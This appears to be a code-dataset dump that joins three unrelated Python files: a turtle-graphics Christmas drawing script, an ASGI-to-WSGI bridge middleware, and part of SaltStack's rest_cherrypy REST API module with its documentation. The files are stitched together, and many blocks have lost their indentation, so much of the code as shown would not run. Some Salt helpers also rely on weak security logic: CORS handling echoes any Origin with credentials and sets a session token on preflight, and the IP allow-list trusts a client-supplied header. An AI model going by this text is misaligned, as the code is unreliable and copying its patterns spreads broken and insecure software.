source | python
|---|---|
run.py
|
import time
import playsound
from turtle import *
from random import randint
from threading import Thread
def play_bg_music():
playsound.playsound("system-files//bg-sound.mp3")
def finish_music():
playsound.playsound("system-files//finish-sound.mp3")
thread1 = Thread(target = play_bg_music)
thread1.start()
time.sleep(2)
def create_rectangle(turtle, color, x, y, width, height):
turtle.penup()
turtle.color(color)
turtle.fillcolor(color)
turtle.goto(x, y)
turtle.pendown()
turtle.begin_fill()
turtle.forward(width)
turtle.left(90)
turtle.forward(height)
turtle.left(90)
turtle.forward(width)
turtle.left(90)
turtle.forward(height)
turtle.left(90)
# fill the above shape
turtle.end_fill()
# Reset the orientation of the turtle
turtle.setheading(0)
def create_circle(turtle, x, y, radius, color):
    # Use the turtle object passed in, rather than the global turtle_pen
    turtle.penup()
    turtle.color(color)
    turtle.fillcolor(color)
    turtle.goto(x, y)
    turtle.pendown()
    turtle.begin_fill()
    turtle.circle(radius)
    turtle.end_fill()
BG_COLOR = "#000000"
turtle_pen = Turtle()  # Create the turtle object
turtle_pen.speed(10)  # Set the drawing speed
screen = turtle_pen.getscreen()  # Get the screen object
screen.bgcolor(BG_COLOR)  # Set the background color
screen.title("Merry Christmas")  # Set the window title
screen.setup(width=1.0, height=1.0)  # Use a full-screen window
y = 0
# Draw tree
width = 340
turtle_pen.speed(50)
while width > 10:
width = width - 10
height = 10
x = 0 - width/2
create_rectangle(turtle_pen, "green", x, y, width, height)
y = y + height
# Draw the star on top of the tree
turtle_pen.speed(5)
turtle_pen.penup()
turtle_pen.color('red')
turtle_pen.goto(-20, y+10)
turtle_pen.begin_fill()
turtle_pen.pendown()
for i in range(5):
turtle_pen.forward(40)
turtle_pen.right(144)
turtle_pen.end_fill()
y = -100
create_rectangle(turtle_pen, "brown", -15, y-60, 30, 60) # Draw tree trunk
# Draw the lower part of the tree, from the top of the trunk upward
width = 340
turtle_pen.speed(50)
while width > 5:
width = width - 10
height = 10
x = 0 - width/2
create_rectangle(turtle_pen, "green", x, y, width, height)
y = y + height
tree_height = y + 40
# Draw yellow color moon
create_circle(turtle_pen, 230, 180, 60, "yellow")
# Slice the full circle to make a crescent design
create_circle(turtle_pen, 220, 180, 60, BG_COLOR)
# Draw stars on black background.
turtle_pen.speed(300)
number_of_stars = randint(50,60)
# print(number_of_stars)
for _ in range(0,number_of_stars):
x_star = randint(-(screen.window_width()//2),screen.window_width()//2)
y_star = randint(tree_height, screen.window_height()//2)
size = randint(5,20)
turtle_pen.penup()
turtle_pen.color('white')
turtle_pen.goto(x_star, y_star)
turtle_pen.begin_fill()
turtle_pen.pendown()
for i in range(5):
turtle_pen.forward(size)
turtle_pen.right(144)
turtle_pen.end_fill()
# print greeting message
turtle_pen.speed(5)
turtle_pen.penup()
msg = "Wishing You A Very Merry Christmas ~ Gunarakulan Gunaretnam"
turtle_pen.goto(0, -200)  # y is negative because the tree trunk sits below the x axis
turtle_pen.color("orange")
turtle_pen.pendown()
turtle_pen.write(msg, move=False, align="center", font=("Arial", 25, "bold"))
finish_music()
turtle_pen.hideturtle()
screen.mainloop()
|
asgi.py
|
import asyncio
import collections
import threading
from http import HTTPStatus
from itertools import chain
from typing import Any, Deque, Iterable
from .types import ASGIApp, Environ, Message, Scope, StartResponse
__all__ = ("ASGIMiddleware",)
class AsyncEvent:
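    """
    An event that is awaited on the event loop but set from the WSGI thread:
    set() delivers a message thread-safely to every coroutine currently blocked
    in wait(); after set_nowait() has been called, wait() returns None at once.
    """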
def __init__(self, loop: asyncio.AbstractEventLoop) -> None:
self.loop = loop
self.__waiters: Deque[asyncio.Future] = collections.deque()
self.__nowait = False
def _set(self, message: Any) -> None:
for future in filter(lambda f: not f.done(), self.__waiters):
future.set_result(message)
def set(self, message: Any) -> None:
self.loop.call_soon_threadsafe(self._set, message)
async def wait(self) -> Any:
if self.__nowait:
return None
future = self.loop.create_future()
self.__waiters.append(future)
try:
result = await future
return result
finally:
self.__waiters.remove(future)
def set_nowait(self) -> None:
self.__nowait = True
class SyncEvent:
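    """
    A thread-safe single-slot mailbox: set() stores a message and wakes the
    WSGI thread, whose wait() blocks until a message arrives, clears the event,
    and returns the message.
    """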
def __init__(self) -> None:
self.__write_event = threading.Event()
self.__message: Any = None
def set(self, message: Any) -> None:
self.__message = message
self.__write_event.set()
def wait(self) -> Any:
self.__write_event.wait()
self.__write_event.clear()
message, self.__message = self.__message, None
return message
def build_scope(environ: Environ) -> Scope:
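    """Translate a WSGI environ dict into an ASGI HTTP connection scope."""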
headers = [
(key.lower().replace("_", "-").encode("latin-1"), value.encode("latin-1"))
for key, value in chain(
(
(key[5:], value)
for key, value in environ.items()
if key.startswith("HTTP_")
),
(
(key, value)
for key, value in environ.items()
if key in ("CONTENT_TYPE", "CONTENT_LENGTH")
),
)
]
if environ.get("REMOTE_ADDR") and environ.get("REMOTE_PORT"):
client = (environ["REMOTE_ADDR"], int(environ["REMOTE_PORT"]))
else:
client = None
return {
"wsgi_environ": environ,
"type": "http",
"asgi": {"version": "3.0", "spec_version": "3.0"},
"http_version": environ.get("SERVER_PROTOCOL", "http/1.0").split("/")[1],
"method": environ["REQUEST_METHOD"],
"scheme": environ.get("wsgi.url_scheme", "http"),
"path": environ["PATH_INFO"].encode("latin1").decode("utf8"),
"query_string": environ["QUERY_STRING"].encode("ascii"),
"root_path": environ.get("SCRIPT_NAME", "").encode("latin1").decode("utf8"),
"client": client,
"server": (environ["SERVER_NAME"], int(environ["SERVER_PORT"])),
"headers": headers,
}
class ASGIMiddleware:
"""
Convert ASGIApp to WSGIApp.
wait_time: After the http response ends, the maximum time to wait for the ASGI app to run.
"""
def __init__(
self,
app: ASGIApp,
wait_time: float = None,
loop: asyncio.AbstractEventLoop = None,
) -> None:
self.app = app
if loop is None:
loop = asyncio.new_event_loop()
loop_threading = threading.Thread(target=loop.run_forever, daemon=True)
loop_threading.start()
self.loop = loop
self.wait_time = wait_time
def __call__(
self, environ: Environ, start_response: StartResponse
) -> Iterable[bytes]:
return ASGIResponder(self.loop, self.app, wait_time=self.wait_time)(
environ, start_response
)
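# A minimal usage sketch (the ASGI app below is illustrative, not part of this
# module): wrap any ASGI application and hand the result to a WSGI server.
#
#     async def app(scope, receive, send):
#         await send({"type": "http.response.start", "status": 200, "headers": []})
#         await send({"type": "http.response.body", "body": b"Hello, world!"})
#
#     application = ASGIMiddleware(app)  # callable as application(environ, start_response)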
class ASGIResponder:
def __init__(
self, loop: asyncio.AbstractEventLoop, app: ASGIApp, wait_time: float = None
) -> None:
self.loop = loop
self.app = app
self.wait_time = wait_time
self.sync_event = SyncEvent()
self.async_event = AsyncEvent(loop)
loop.call_soon_threadsafe(self._init_asgi_lock)
def _init_asgi_lock(self) -> None:
self.async_lock = asyncio.Lock()
def __call__(
self, environ: Environ, start_response: StartResponse
) -> Iterable[bytes]:
asgi_done = threading.Event()
wsgi_should_stop = False
def _done_callback(future: asyncio.Future) -> None:
if future.exception() is not None:
e: BaseException = future.exception() # type: ignore
self.sync_event.set(
{"type": "error", "exception": (type(e), e, e.__traceback__)}
)
asgi_done.set()
run_asgi: asyncio.Task = self.loop.create_task(
self.app(build_scope(environ), self.asgi_receive, self.asgi_send)
)
run_asgi.add_done_callback(_done_callback)
read_count, body = 0, environ["wsgi.input"]
content_length = int(environ.get("CONTENT_LENGTH", None) or 0)
self.loop.call_soon_threadsafe(lambda: None)
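        # Bridge loop: block for messages produced by the ASGI task (running on
        # the event loop thread) and translate them into start_response() calls
        # and yielded body chunks on this WSGI worker thread.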
while not wsgi_should_stop:
message = self.sync_event.wait()
message_type = message["type"]
if message_type == "http.response.start":
status = message["status"]
headers = [
(
name.strip().decode("latin1"),
value.strip().decode("latin1"),
)
for name, value in message["headers"]
]
start_response(f"{status} {HTTPStatus(status).phrase}", headers, None)
elif message_type == "http.response.body":
yield message.get("body", b"")
wsgi_should_stop = not message.get("more_body", False)
elif message_type == "http.response.disconnect":
wsgi_should_stop = True
elif message_type == "error":
start_response(
f"{500} {HTTPStatus(500).phrase}",
[
("Content-Type", "text/plain; charset=utf-8"),
("Content-Length", str(len(HTTPStatus(500).description))),
],
message["exception"],
)
yield str(HTTPStatus(500).description).encode("utf-8")
wsgi_should_stop = True
if message_type == "receive":
data = body.read(min(4096, content_length - read_count))
read_count += len(data)
self.async_event.set(
{
"type": "http.request",
"body": data,
"more_body": read_count < content_length,
}
)
else:
self.async_event.set(None)
if wsgi_should_stop:
self.async_event.set_nowait()
if run_asgi.done():
break
# HTTP response ends, wait for run_asgi's background tasks
asgi_done.wait(self.wait_time)
run_asgi.cancel()
yield b""
async def asgi_receive(self) -> Message:
async with self.async_lock:
self.sync_event.set({"type": "receive"})
return await self.async_event.wait()
async def asgi_send(self, message: Message) -> None:
async with self.async_lock:
self.sync_event.set(message)
await self.async_event.wait()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms, and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
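    For reference, a configuration combining several of the options above might
    look like the following (paths and values are illustrative only):

    .. code-block:: yaml

        rest_cherrypy:
          port: 8000
          ssl_crt: /etc/pki/tls/certs/localhost.crt
          ssl_key: /etc/pki/tls/certs/localhost.key
          static: /srv/salt-api/static
          static_path: /static
          app: /srv/salt-api/index.html
          app_path: /app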
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
but cannot express complex data structures, which many Salt commands require --
for example, starting a state run that uses Pillar data. Salt's CLI tool can
reformat strings passed at the CLI into complex data structures, and that
behavior also works via salt-api, but it can be brittle; since salt-api accepts
JSON it is best to just send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running jobs asynchronously makes it possible to process 3x more commands per
second with ``LocalClient`` and 17x more commands per second with ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
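A minimal sketch of that asynchronous workflow (the job id below is illustrative
and matches the ``/minions`` example later in this document):

.. code-block:: bash

    # Dispatch a command asynchronously; the response contains the jid:
    curl -b ~/cookies.txt -sSi localhost:8000 \\
        -H 'Content-type: application/json' \\
        -d '[{"client": "local_async", "tgt": "*", "fun": "test.ping"}]'

    # Later, fetch the job return from the job cache:
    curl -b ~/cookies.txt -sS localhost:8000/jobs/20130603122505459265 \\
        -H 'Accept: application/json'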
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
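For example, a tuning override in the master config might look like this
(values are illustrative; measure before and after changing them):

.. code-block:: yaml

    rest_cherrypy:
      port: 8000
      thread_pool: 200
      socket_queue_size: 100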
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
    logger.warning('Import of cherrypy.cpstats failed. '
                   'Possible upstream bug: '
                   'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
    cpstats = None
    logger.warning('Import of cherrypy.cpstats failed.')
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
from salt.ext import six
from salt.ext.six import BytesIO
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
    .. versionadded:: 2016.3.0

    Verify a user request against the API whitelist (username/IP pairs) in
    order to provide whitelisting for the API similar to the master, but at
    the API level.

    .. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user %s from IP %s")
success_str = ("[api_acl] Authentication sucessful for "
"user %s from IP %s")
pass_str = ("[api_acl] Authentication not checked for "
"user %s from IP %s")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(pass_str, username, ip)
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug('Found IP list: %s', auth_ip_list)
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug('Request from IP: %s', rem_ip)
if rem_ip not in auth_ip_list:
logger.error('Blocked IP: %s', rem_ip)
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', salt.utils.json.dumps),
('application/x-yaml', functools.partial(
salt.utils.yaml.safe_dump, default_flow_style=False)),
)
